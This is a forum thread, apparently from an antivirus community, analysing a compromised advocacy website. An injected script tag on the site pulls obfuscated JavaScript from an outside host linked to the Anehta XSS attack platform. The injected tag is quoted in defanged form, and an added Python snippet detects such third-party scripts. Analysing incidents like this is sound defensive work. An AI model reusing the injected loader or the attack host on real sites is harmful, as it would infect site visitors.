World Uyghur Congress web site distributes virus . . .

When I attempted to visit the web site of the World Uyghur Congress a few moments ago, Avast! generated a pop-up window indicating that it had blocked the download of a virus. It would not be surprising if this site were hacked maliciously as an Australian film festival web site was also reported hacked this morning by a protester in China unhappy that the festival is planning to show a documentary film on an exiled Uyghur leader.

Here are the details I encountered:

  1. Virus identified: JS-CVE-2009-1136-A[Expl] (which is an Exploit)
  2. Web address: wXw.uyghurcongress.org/En/home.asp
  3. Malicious file identified by Avast!: m2m.net84.net/cn/document.js

I would appreciate it if others more expert than me could confirm that this site is contaminated, and obtain any further useful information. Many thanks.

Hi Bolt,

First, please could you modify the URL to make it inactive (i.e. change www to wXw) to prevent others potentially becoming infected.

Second, this seems to be an injected script that links to an infected JavaScript file at the site mentioned.
It is within the html and body tags, so it is unclear whether it was originally supposed to be there. (first image)

The contents of the js file are suspicious, as there is a very long piece of what looks like obfuscated code. (second image)

The main point is that this is a genuine detection and is something that needs investigating.

Hope this helps,

-Scott-

Although avast didn’t alert on visiting the link to the home.asp page, at the bottom of the home page is a script tag (see image) that tries to run a JavaScript document from another site, the file you mentioned. So this script tag could have been inserted maliciously.

I tried to get a copy of the document.js file, but it is 0 KB in size. This may have been why avast doesn’t alert, as there ‘currently’ is no content in that file; that could change at any time, and the real problem would be why the script tag has been inserted in the first place.

Update: Managed to get a copy of the file from an avast alert and uploaded it to VirusTotal: http://www.virustotal.com/analisis/7ee751aac47f5a3dd61e359b71861b1572d75678e03a64291634093250a874b9-1248706214. Only 4 detections, which isn’t unusual given that there are very few even looking for this type of thing, much less detecting it.
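The two checks the replies above describe by hand, spotting a script tag at the bottom of a page that pulls JavaScript from a third-party host, and defanging the URL before posting it, can be scripted. The following is an added example written for this thread, not code from any of the posters or from avast; the HTML sample is constructed (only the two host names are taken from the thread), and the `allowed_hosts` parameter is an assumption about how a site owner would whitelist their own CDN.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample page modelled on the thread's description: a normal
# first-party script in the head, and an injected third-party script tag
# just before </body>. The markup itself is made up for this example.
SAMPLE_HTML = """<html><head><title>Home</title>
<script src="/js/menu.js"></script></head>
<body><p>Welcome</p>
<script type="text/javascript" src="http://m2m.net84.net/cn/document.js"></script>
</body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)


def find_external_scripts(html, page_url, allowed_hosts=()):
    """Return absolute URLs of scripts loaded from hosts other than the page's
    own host or an explicit allow-list (assumed: the owner's known CDNs).

    Relative and protocol-relative src values are resolved against page_url
    so that '/js/menu.js' is correctly treated as first-party.
    """
    parser = ScriptSrcCollector()
    parser.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    allowed = {page_host} | {h.lower() for h in allowed_hosts}
    external = []
    for src in parser.srcs:
        absolute = urljoin(page_url, src)
        host = (urlparse(absolute).hostname or "").lower()
        if host and host not in allowed:
            external.append(absolute)
    return external


def defang(url):
    """Make a URL non-clickable before pasting it into a forum post, following
    the wXw convention asked for in this thread plus hxxp for the scheme."""
    out = url.replace("https://", "hxxps://").replace("http://", "hxxp://")
    return out.replace("://www.", "://wXw.")


if __name__ == "__main__":
    page = "http://www.uyghurcongress.org/En/home.asp"
    for hit in find_external_scripts(SAMPLE_HTML, page):
        print("third-party script:", defang(hit))
```

Running it against the constructed sample reports only the m2m.net84.net script, already defanged; the first-party `/js/menu.js` is resolved to the page's own host and ignored. On a real incident the same function can be run over a saved copy of the page before and after cleanup to confirm the injected tag is gone, independent of whether the remote file happens to be empty at the moment of checking.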

Hi Bolt,

This is the malcode in question:

[EDITED by ME]^^script src="htxtp://m2m.net84.net/cn/document.js"^^/script 

Where you get this:
Title:
HTTP Error 403 Forbidden
URL: hXtp://m2m.net84.net/cn
Redirects: 301 → hXtp://m2m.net84.net/cn/
where I get:

 ^a href="anehta-v0.6.0fixed/" anehta-v0.6.0fixed/^/a></li

And this is at the crux of the malcode, because of the description:
Anehta is a PHP/Javascript based platform to make cross site scripting and other web attacks easier, via a specific “attack API”.
Author: axis
Homepage: hXtp://code.google.com/p/anehta/
File Size: 5596731
Last Modified: Nov 25 17:46:32 2008
MD5 Checksum: 5316c6cb785caef595c58e80a97f4ce8

302 → hXtp://error.000webhost.com/forbidden.html

polonus